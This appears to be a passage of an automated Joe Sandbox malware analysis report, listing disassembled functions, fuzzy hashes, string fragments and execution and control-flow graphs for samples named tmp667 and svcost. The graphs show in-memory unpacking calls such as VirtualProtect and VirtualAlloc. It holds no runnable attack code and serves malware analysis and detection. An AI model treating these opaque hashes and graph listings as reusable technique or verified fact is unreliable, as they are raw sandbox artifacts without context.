                                                                                                • Instruction Fuzzy Hash: D2413171D05A588BEB1CCF6B8D4069EFAF7AFC9301F14D1B9881CAA259EB3045468F51
                                                                                                Function 006DC088 Relevance: .4, Instructions: 431COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cb3eaf7795797aa4aa477b174add8d2bdd47620b5db45fd5cb9dd0ff7613fb3c
                                                                                                • Instruction ID: 113935667dc38ce4df4dd201fcaf92ef56d72797eca38613fd671d77a1a984c9
                                                                                                • Opcode Fuzzy Hash: cb3eaf7795797aa4aa477b174add8d2bdd47620b5db45fd5cb9dd0ff7613fb3c
                                                                                                • Instruction Fuzzy Hash: 8612B370E006598BDB14CFAAC98069DFBF2BF88314F24C56AD459EB31AD734A946CF50
                                                                                                Function 04980040 Relevance: .1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f31d044ec4b947d460900d676e382ef31bd8726edce34813b828e0d28c3f467
                                                                                                • Instruction ID: d0ac67710ec4d2dd21b3ca15ac48e1c43461d6671b0b22f5f34c7f5c5fd21d64
                                                                                                • Opcode Fuzzy Hash: 0f31d044ec4b947d460900d676e382ef31bd8726edce34813b828e0d28c3f467
                                                                                                • Instruction Fuzzy Hash: 53512B71E016688BEB6CCF1B8D546CAFAF3AFC9300F14C1FA994CA6254DB715A858E41
                                                                                                Function 0498DB88 Relevance: .1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: abd358b75739abc5e914e6a16b9d23054ada79601b57f28245aa580728697752
                                                                                                • Instruction ID: 13b762dee7d0482bbbbb79fdb7b8ebde5d5461e020899f6513ef5d5c8171b881
                                                                                                • Opcode Fuzzy Hash: abd358b75739abc5e914e6a16b9d23054ada79601b57f28245aa580728697752
                                                                                                • Instruction Fuzzy Hash: 7F41DEB4D003489FDB14DFA9D985A9EBBF1BB19304F20952AE818AB290D7B4A845CF45
                                                                                                Function 00600CD8 Relevance: .1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446416761.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_600000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0412386d253653200f58d6d18e2c587ee6109fed1bd10ff599bedd40fea53b
                                                                                                • Instruction ID: 7fed239b7ca35f912a5f5a2128e7cbe2ffaaa45c081b94df989dd6cba9254124
                                                                                                • Opcode Fuzzy Hash: 8c0412386d253653200f58d6d18e2c587ee6109fed1bd10ff599bedd40fea53b
                                                                                                • Instruction Fuzzy Hash: CD21BEB5D002189FDB14CFA9D884AEEFBF5EB49314F14942AE804B7250C735A905CFA5
                                                                                                Function 006D57C8 Relevance: .1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 58cecd75200a91a1ef5908d411ced8858179e2a8ad3738ccec9d2c193381c002
                                                                                                • Instruction ID: 6debda26bfc25ccad919096a5fe6ab33b79b7f939822cbb02b67919523449797
                                                                                                • Opcode Fuzzy Hash: 58cecd75200a91a1ef5908d411ced8858179e2a8ad3738ccec9d2c193381c002
                                                                                                • Instruction Fuzzy Hash: 4821CC71E056289BDB18CF6BD9402DDFAF7AFC9310F14C0BAD909A6214DB300A968E44
                                                                                                Function 006D7A04 Relevance: 6.3, Strings: 5, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: S$X$c$c$$oV
                                                                                                • API String ID: 0-3883161067
                                                                                                • Opcode ID: f89221adb9c4d6435d210daf5292322856a50d4c3391651eacee38a26d791152
                                                                                                • Instruction ID: 8a1946a09b4b867b84bbe2fa24587115abaac4dd5252f116d534b8cd07f3518f
                                                                                                • Opcode Fuzzy Hash: f89221adb9c4d6435d210daf5292322856a50d4c3391651eacee38a26d791152
                                                                                                • Instruction Fuzzy Hash: 79211470D04219CFDB60DF54C8987EDBBB6AB45314F2040EAE419AB390DB704E85DF5A
                                                                                                Function 006BC3D3 Relevance: 5.1, Strings: 4, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$oV
                                                                                                • API String ID: 0-4285723052
                                                                                                • Opcode ID: a253415c35f21a782cb889c553a242d190c970961e5fa312602b2e51fce2ea1e
                                                                                                • Instruction ID: f7164e893657f61aee3d386983ab2855dfd8ae6094fe7aef984093c1eb42cae5
                                                                                                • Opcode Fuzzy Hash: a253415c35f21a782cb889c553a242d190c970961e5fa312602b2e51fce2ea1e
                                                                                                • Instruction Fuzzy Hash: C321EEB4901269CFDB24EF58E988BDCB7B2AB49315F1090EAD619A7344D7709E81CF14
                                                                                                Function 006BBE7C Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$,$D$oV
                                                                                                • API String ID: 0-4285723052
                                                                                                • Opcode ID: 2d5c480d2f2641e6e678606abdf11926d9e62b333d29bde5f4baede2f63f578b
                                                                                                • Instruction ID: a2c64a8e4afb9196c34bd5f68cb05a45e9f2ab7dddd4aa1c14971ee46e4a5efd
                                                                                                • Opcode Fuzzy Hash: 2d5c480d2f2641e6e678606abdf11926d9e62b333d29bde5f4baede2f63f578b
                                                                                                • Instruction Fuzzy Hash: 0221DBB4901268CFDB24EF58D898BD8B7F6EB49315F1090EADA19A7344C7749E85CF08
                                                                                                Function 006BCCD2 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )$+$2$oV
                                                                                                • API String ID: 0-1288159413
                                                                                                • Opcode ID: b3eeaf03510a38d3d7554cc8f9111eb9fc3f2400ae28fc2903837b458661c13e
                                                                                                • Instruction ID: b7f21efa497c8566182e30a419a7e962820048626e3429b50cf41cb69305f6a7
                                                                                                • Opcode Fuzzy Hash: b3eeaf03510a38d3d7554cc8f9111eb9fc3f2400ae28fc2903837b458661c13e
                                                                                                • Instruction Fuzzy Hash: 1B21CEB4901268CFDB24EF58D888BDCB7B2FB49315F5091A6DA1AA7354C3745E85CF04
                                                                                                Function 006D7D84 Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$1$K$oV
                                                                                                • API String ID: 0-1421157475
                                                                                                • Opcode ID: e937e77bd6f06d7293567a35840a49db465764ca16b718325ca281ef81ff2102
                                                                                                • Instruction ID: 5efb6476c6dc18d9f5fe9e2d0fb913c514e1829e84331e29db4a1c1f5fd7928b
                                                                                                • Opcode Fuzzy Hash: e937e77bd6f06d7293567a35840a49db465764ca16b718325ca281ef81ff2102
                                                                                                • Instruction Fuzzy Hash: A3110474E04219CFDB61EF68D98879DBBF1FB49310F1401A6E409AB380CB749A81CF05
                                                                                                Function 006D87B7 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: O$a$d$c$
                                                                                                • API String ID: 0-3986790086
                                                                                                • Opcode ID: 6350be7a9ac3562f29df3c5e366788c63f31d8bfe0fe48d2f3664870df615f95
                                                                                                • Instruction ID: bfcfbf35e54cf35cd154220e7b517b5fe3fbdb49c2ae2748013df78df6dd1e60
                                                                                                • Opcode Fuzzy Hash: 6350be7a9ac3562f29df3c5e366788c63f31d8bfe0fe48d2f3664870df615f95
                                                                                                • Instruction Fuzzy Hash: 88F0DAB4D04359CEDF608F54C8987DDBAB2AB4A311F241097D5497A380DB7489C58B1A

                                                                                                Execution Graph

                                                                                                Execution Coverage:9.7%
                                                                                                Dynamic/Decrypted Code Coverage:73%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:63
                                                                                                Total number of Limit Nodes:3
                                                                                                execution_graph 53679 2cd048 53680 2cd060 53679->53680 53681 2cd0bb 53680->53681 53683 4b7e428 53680->53683 53684 4b7e481 53683->53684 53687 4b7e9b8 53684->53687 53685 4b7e4b6 53688 4b7e9e5 53687->53688 53691 4b7eb7b 53688->53691 53692 4b7d840 53688->53692 53691->53685 53694 4b7d867 53692->53694 53696 4b7dd40 53694->53696 53697 4b7dd89 VirtualProtect 53696->53697 53699 4b7d924 53697->53699 53699->53685 53640 8e4288 53641 8e429b LdrInitializeThunk 53640->53641 53700 3188c8 53701 3188d3 53700->53701 53702 3188f5 53701->53702 53707 4b7a647 53701->53707 53710 4b77a1d 53701->53710 53714 4b7244d 53701->53714 53717 4b74cd6 53701->53717 53709 4b7d840 VirtualProtect 53707->53709 53708 4b701de 53709->53708 53711 4b77a3c 53710->53711 53713 4b7d840 VirtualProtect 53711->53713 53712 4b701de 53713->53712 53716 4b7d840 VirtualProtect 53714->53716 53715 4b701de 53716->53715 53718 4b74cf5 53717->53718 53720 4b7d840 VirtualProtect 53718->53720 53719 4b74d1a 53720->53719 53643 43264b8 53644 43264c2 53643->53644 53648 c5bf08 53644->53648 53653 c5bf18 53644->53653 53645 43264a2 53649 c5bf2d 53648->53649 53658 c5bf49 53649->53658 53662 c5bf58 53649->53662 53650 c5bf43 53650->53645 53654 c5bf2d 53653->53654 53656 c5bf49 2 API calls 53654->53656 53657 c5bf58 2 API calls 53654->53657 53655 c5bf43 53655->53645 53656->53655 53657->53655 53660 c5bf58 53658->53660 53659 c5c0ef 53659->53650 53660->53659 53666 c5f847 53660->53666 53664 c5bf82 53662->53664 53663 c5c0ef 53663->53650 53664->53663 53665 c5f847 2 API calls 53664->53665 53665->53664 53667 c5f86d 53666->53667 53671 c5f710 53667->53671 53675 c5f708 53667->53675 53668 c5f888 53668->53660 53672 c5f754 SleepEx 53671->53672 53674 c5f7b4 53672->53674 53674->53668 53676 c5f754 SleepEx 53675->53676 53678 c5f7b4 53676->53678 53678->53668 53721 4b7ef08 53722 4b7ef4c VirtualAlloc 53721->53722 53724 4b7efb9 53722->53724

                                                                                                Executed Functions

                                                                                                Function 00C2D980 Relevance: 19.4, Strings: 15, Instructions: 618COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 c2d980-c2d9a1 1 c2d9a3 0->1 2 c2d9a8-c2da38 call c2e4f6 0->2 1->2 7 c2da3e-c2da8b 2->7 10 c2da9a 7->10 11 c2da8d-c2da98 7->11 12 c2daa4-c2dbbf 10->12 11->12 23 c2dbd1-c2dbfc 12->23 24 c2dbc1-c2dbc7 12->24 25 c2e3c8-c2e3e4 23->25 24->23 26 c2dc01-c2dd64 call c2c798 25->26 27 c2e3ea-c2e405 25->27 38 c2dd76-c2df0b call c29f18 call c29df0 26->38 39 c2dd66-c2dd6c 26->39 51 c2df70-c2df7a 38->51 52 c2df0d-c2df11 38->52 39->38 55 c2e1a1-c2e1c0 51->55 53 c2df13-c2df14 52->53 54 c2df19-c2df6b 52->54 56 c2e246-c2e2b1 53->56 54->56 57 c2e1c6-c2e1f0 55->57 58 c2df7f-c2e0c5 call c2c798 55->58 75 c2e2c3-c2e30e 56->75 76 c2e2b3-c2e2b9 56->76 64 c2e1f2-c2e240 57->64 65 c2e243-c2e244 57->65 87 c2e19a-c2e19b 58->87 88 c2e0cb-c2e197 call c2c798 58->88 64->65 65->56 78 c2e314-c2e3ac 75->78 79 c2e3ad-c2e3c5 75->79 76->75 78->79 79->25 87->55 88->87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$8$`Xh$l:$l:$l:$l:$l:$x:$x:$x:$:$:$:$:
                                                                                                • API String ID: 0-1956871077
                                                                                                • Opcode ID: b637b39e2e26d2dfbee819fbbabd50ce4b4a5cb972d0196d4f07eb03d43f9e2b
                                                                                                • Instruction ID: 94b52c918d720f402b8d8857438e63e7d9a7d9359d98b524ce7063b442021a7d
                                                                                                • Opcode Fuzzy Hash: b637b39e2e26d2dfbee819fbbabd50ce4b4a5cb972d0196d4f07eb03d43f9e2b
                                                                                                • Instruction Fuzzy Hash: C252D675E002288FDB65DF69C890AD9B7B5FF89310F5082EAD809A7355DB30AE85CF50
                                                                                                Function 00C2D970 Relevance: 7.7, Strings: 6, Instructions: 189COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 96 c2d970-c2d97c 97 c2d941-c2d94d 96->97 98 c2d97e-c2d9a1 96->98 100 c2d954-c2d95d 97->100 101 c2d94f 97->101 102 c2d9a3 98->102 103 c2d9a8-c2da38 call c2e4f6 98->103 198 c2d960 call c2d980 100->198 199 c2d960 call c2d970 100->199 101->100 102->103 110 c2da3e-c2da8b 103->110 106 c2d962-c2d96b 113 c2da9a 110->113 114 c2da8d-c2da98 110->114 115 c2daa4-c2dbbf 113->115 114->115 126 c2dbd1-c2dbfc 115->126 127 c2dbc1-c2dbc7 115->127 128 c2e3c8-c2e3e4 126->128 127->126 129 c2dc01-c2dd64 call c2c798 128->129 130 c2e3ea-c2e405 128->130 141 c2dd76-c2df0b call c29f18 call c29df0 129->141 142 c2dd66-c2dd6c 129->142 154 c2df70-c2df7a 141->154 155 c2df0d-c2df11 141->155 142->141 158 c2e1a1-c2e1c0 154->158 156 c2df13-c2df14 155->156 157 c2df19-c2df6b 155->157 159 c2e246-c2e2b1 156->159 157->159 160 c2e1c6-c2e1f0 158->160 161 c2df7f-c2e0c5 call c2c798 158->161 178 c2e2c3-c2e30e 159->178 179 c2e2b3-c2e2b9 159->179 167 c2e1f2-c2e240 160->167 168 c2e243-c2e244 160->168 190 c2e19a-c2e19b 161->190 191 c2e0cb-c2e197 call c2c798 161->191 167->168 168->159 181 c2e314-c2e3ac 178->181 182 c2e3ad-c2e3c5 178->182 179->178 181->182 182->128 190->158 191->190 198->106 199->106
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$`Xh$h$x:$x:$x:
                                                                                                • API String ID: 0-2585101112
                                                                                                • Opcode ID: 20f3886cb734b5c41886a51ca6f17fdde132084167a69e9db6960b09af2424d1
                                                                                                • Instruction ID: 08739406a6b0024053327848218fdf175533eccdb87aa33ea6f9b20dc7fcc35d
                                                                                                • Opcode Fuzzy Hash: 20f3886cb734b5c41886a51ca6f17fdde132084167a69e9db6960b09af2424d1
                                                                                                • Instruction Fuzzy Hash: 2B810575E042288FDB65DF69D850BD9B7B2FF89300F1082EAD819A7254DB306E85CF51
                                                                                                Function 00C40040 Relevance: 7.6, Strings: 5, Instructions: 1335COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 201 c40040-c4006e 202 c40075-c40197 201->202 203 c40070 201->203 207 c40199-c401b5 call c42bc0 202->207 208 c401bb-c401c7 202->208 203->202 207->208 209 c401ce-c401d3 208->209 210 c401c9 208->210 211 c401d5-c401e1 209->211 212 c4020b-c40254 209->212 210->209 214 c401e3 211->214 215 c401e8-c40206 211->215 222 c40256 212->222 223 c4025b-c40520 212->223 214->215 216 c4196f-c41975 215->216 218 c41977-c41997 216->218 219 c419a0 216->219 218->219 222->223 248 c40f50-c40f5c 223->248 249 c40525-c40531 248->249 250 c40f62-c40f9a 248->250 251 c40533 249->251 252 c40538-c4065d 249->252 259 c41074-c4107a 250->259 251->252 286 c4069d-c40726 252->286 287 c4065f-c40697 252->287 260 c41080-c410b8 259->260 261 c40f9f-c4101c 259->261 271 c41416-c4141c 260->271 276 c4101e-c41022 261->276 277 c4104f-c41071 261->277 273 c41422-c4146a 271->273 274 c410bd-c412bf 271->274 284 c414e5-c41530 273->284 285 c4146c-c414df 273->285 368 c412c5-c41359 274->368 369 c4135e-c41362 274->369 276->277 281 c41024-c4104c 276->281 277->259 281->277 306 c41939-c4193f 284->306 285->284 313 c40735-c407b9 286->313 314 c40728-c40730 286->314 287->286 309 c41535-c415b7 306->309 310 c41945-c4196d 306->310 328 c415df-c415eb 309->328 329 c415b9-c415d4 309->329 310->216 349 c407c8-c4084c 313->349 350 c407bb-c407c3 313->350 317 c40f41-c40f4d 314->317 317->248 330 c415f2-c415fe 328->330 331 c415ed 328->331 329->328 335 c41600-c4160c 330->335 336 c41611-c41620 330->336 331->330 340 c41920-c41936 335->340 337 c41622 336->337 338 c41629-c41901 336->338 337->338 341 c417f6-c4185e 337->341 342 c4169d-c41715 337->342 343 c4162f-c41698 337->343 344 c41788-c417f1 337->344 345 c4171a-c41783 337->345 371 c4190c-c41918 338->371 340->306 379 c418d2-c418d8 341->379 342->371 343->371 344->371 345->371 393 c4084e-c40856 349->393 394 c4085b-c408df 349->394 350->317 391 c413fd-c41413 368->391 374 c41364-c413bd 369->374 375 c413bf-c413fc 369->375 371->340 374->391 375->391 384 c41860-c418be 379->384 385 c418da-c418e4 379->385 398 c418c5-c418cf 384->398 399 c418c0 384->399 385->371 391->271 393->317 406 c408e1-c408e9 394->406 407 c408ee-c40972 394->407 398->379 399->398 406->317 413 c40974-c4097c 407->413 414 c40981-c40a05 407->414 413->317 420 c40a14-c40a98 414->420 421 c40a07-c40a0f 414->421 427 c40aa7-c40b2b 420->427 428 c40a9a-c40aa2 420->428 421->317 434 c40b2d-c40b35 427->434 435 c40b3a-c40bbe 427->435 428->317 434->317 441 c40bc0-c40bc8 435->441 442 c40bcd-c40c51 435->442 441->317 448 c40c60-c40ce4 442->448 449 c40c53-c40c5b 442->449 455 c40ce6-c40cee 448->455 456 c40cf3-c40d77 448->456 449->317 455->317 462 c40d86-c40e0a 456->462 463 c40d79-c40d81 456->463 469 c40e0c-c40e14 462->469 470 c40e19-c40e9d 462->470 463->317 469->317 476 c40eac-c40f30 470->476 477 c40e9f-c40ea7 470->477 483 c40f32-c40f3a 476->483 484 c40f3c-c40f3e 476->484 477->317 483->317 484->317
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0l:$2$H<:$Lk:$`Xh
                                                                                                • API String ID: 0-3924731554
                                                                                                • Opcode ID: 85fe6ad756a7bb87bbe4b0232d769c8d4fd601eb2a342ec2f2b6c2568321296c
                                                                                                • Instruction ID: 91ff668b8fe0797079eb74f41d84d2cee282ac998c89897e5df103b68aa742e4
                                                                                                • Opcode Fuzzy Hash: 85fe6ad756a7bb87bbe4b0232d769c8d4fd601eb2a342ec2f2b6c2568321296c
                                                                                                • Instruction Fuzzy Hash: 48E2F574A142288FCB65DF69D884BDDBBB6FB89301F1081E9E809A7355DB706E85CF40
                                                                                                Function 0031CAD8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 574 31cad8-31caf9 575 31cb00-31cbe7 574->575 576 31cafb 574->576 578 31d2e9-31d311 575->578 579 31cbed-31cd2e call 319028 575->579 576->575 582 31da17-31da20 578->582 625 31d2b2-31d2dc 579->625 626 31cd34-31cd8f 579->626 584 31da26-31da3d 582->584 585 31d31f-31d329 582->585 586 31d330-31d424 call 319028 585->586 587 31d32b 585->587 608 31d426-31d432 586->608 609 31d44e 586->609 587->586 610 31d434-31d43a 608->610 611 31d43c-31d442 608->611 612 31d454-31d474 609->612 614 31d44c 610->614 611->614 616 31d4d4-31d554 612->616 617 31d476-31d4cf 612->617 614->612 637 31d556-31d5a9 616->637 638 31d5ab-31d5ee call 319028 616->638 629 31da14 617->629 639 31d2e6 625->639 640 31d2de 625->640 634 31cd91 626->634 635 31cd94-31cd9f 626->635 629->582 634->635 636 31d1c7-31d1cd 635->636 641 31d1d3-31d24f call 3184f0 636->641 642 31cda4-31cdc2 636->642 669 31d5f9-31d602 637->669 638->669 639->578 640->639 685 31d29c-31d2a2 641->685 644 31cdc4-31cdc8 642->644 645 31ce19-31ce2e 642->645 644->645 648 31cdca-31cdd5 644->648 650 31ce30 645->650 651 31ce35-31ce4b 645->651 652 31ce0b-31ce11 648->652 650->651 656 31ce52-31ce69 651->656 657 31ce4d 651->657 660 31ce13-31ce14 652->660 661 31cdd7-31cddb 652->661 658 31ce70-31ce86 656->658 659 31ce6b 656->659 657->656 665 31ce88 658->665 666 31ce8d-31ce94 658->666 659->658 668 31ce97-31cf02 660->668 663 31cde1-31cdf9 661->663 664 31cddd 661->664 670 31ce00-31ce08 663->670 671 31cdfb 663->671 664->663 665->666 666->668 672 31cf04-31cf10 668->672 673 31cf16-31d0cb 668->673 675 31d662-31d671 669->675 670->652 671->670 672->673 683 31d0cd-31d0d1 673->683 684 31d12f-31d144 673->684 676 31d673-31d6fb 675->676 677 31d604-31d62c 675->677 712 31d874-31d880 676->712 678 31d633-31d65c 677->678 679 31d62e 677->679 678->675 679->678 683->684 691 31d0d3-31d0e2 683->691 689 31d146 684->689 690 31d14b-31d16c 684->690 687 31d251-31d299 685->687 688 31d2a4-31d2aa 685->688 687->685 688->625 689->690 692 31d173-31d192 690->692 693 31d16e 690->693 695 31d121-31d127 691->695 700 31d194 692->700 701 31d199-31d1b9 692->701 693->692 698 31d0e4-31d0e8 695->698 699 31d129-31d12a 695->699 702 31d0f2-31d113 698->702 703 31d0ea-31d0ee 698->703 706 31d1c4 699->706 700->701 704 31d1c0 701->704 705 31d1bb 701->705 708 31d115 702->708 709 31d11a-31d11e 702->709 703->702 704->706 705->704 706->636 708->709 709->695 714 31d700-31d709 712->714 715 31d886-31d8e1 712->715 716 31d712-31d868 714->716 717 31d70b 714->717 730 31d8e3-31d916 715->730 731 31d918-31d942 715->731 735 31d86e 716->735 717->716 719 31d7a2-31d7e2 717->719 720 31d7e7-31d827 717->720 721 31d718-31d758 717->721 722 31d75d-31d79d 717->722 719->735 720->735 721->735 722->735 739 31d94b-31d9de 730->739 731->739 735->712 743 31d9e5-31da05 739->743 743->629
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0:$TJ"p$p!p$xb p
                                                                                                • API String ID: 0-3026496591
                                                                                                • Opcode ID: 71ce13d894cd4b53c0f5cf61e17f61f4910b1ee8f8df89d1e6465ea696f80ed6
                                                                                                • Instruction ID: c272fca33cf0e0946237ab6c740ccc567569b992ed651bd294ff6374709cba2e
                                                                                                • Opcode Fuzzy Hash: 71ce13d894cd4b53c0f5cf61e17f61f4910b1ee8f8df89d1e6465ea696f80ed6
                                                                                                • Instruction Fuzzy Hash: ADA2A475A00228CFDB65CF69C984ADDBBB2BF89304F1581E9D509AB365DB319E81CF40
                                                                                                Function 00C419A3 Relevance: 4.3, Strings: 3, Instructions: 539COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 745 c419a3-c41a4b 752 c41a51-c41b14 745->752 753 c41b23-c41b6b 745->753 752->753 783 c41b16-c41b20 752->783 758 c41b71-c41bb3 753->758 759 c41d0c-c41dc0 753->759 767 c41cf1-c41d00 758->767 788 c41dc6-c41e7d 759->788 789 c41e7f-c41eb9 759->789 769 c41d06-c41d07 767->769 770 c41bd0-c41bdf 767->770 771 c4208f-c420e4 769->771 773 c41be6-c41c58 770->773 774 c41be1 770->774 791 c4237d-c423ab 771->791 785 c41c5f-c41ce6 773->785 786 c41c5a 773->786 774->773 783->753 834 c41ce8 785->834 835 c41ceb 785->835 786->785 801 c41ec0-c41ec9 788->801 789->801 798 c423b1-c423d2 791->798 799 c420e9-c4212a 791->799 870 c423d8 call c455d8 798->870 871 c423d8 call c455c9 798->871 807 c42133-c42134 799->807 808 c4212c 799->808 805 c4207a-c42089 801->805 805->771 810 c41ece-c41edd 805->810 809 c42377 807->809 808->807 813 c42216-c4227b 808->813 814 c42280-c422c5 808->814 815 c42311-c42323 808->815 816 c421b3-c42211 808->816 817 c42333-c4236c 808->817 818 c4215e-c421ae 808->818 819 c42139-c4214b 808->819 820 c422ca-c4230f 808->820 809->791 821 c41ee4-c41f65 810->821 822 c41edf 810->822 812 c423de-c4241a call 541deb8 848 c42420 812->848 813->809 814->809 826 c42325 815->826 827 c4232a-c42331 815->827 816->809 817->809 818->809 824 c42152-c42159 819->824 825 c4214d 819->825 820->809 857 c41ff4-c4201f 821->857 858 c41f6b-c41f96 821->858 822->821 824->809 825->824 826->827 827->809 834->835 835->767 861 c42026-c42069 857->861 862 c42021 857->862 859 c41f9d-c41fef 858->859 860 c41f98 858->860 867 c42074 859->867 860->859 861->867 862->861 867->805 870->812 871->812
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh$`{:$`{:
                                                                                                • API String ID: 0-1737831806
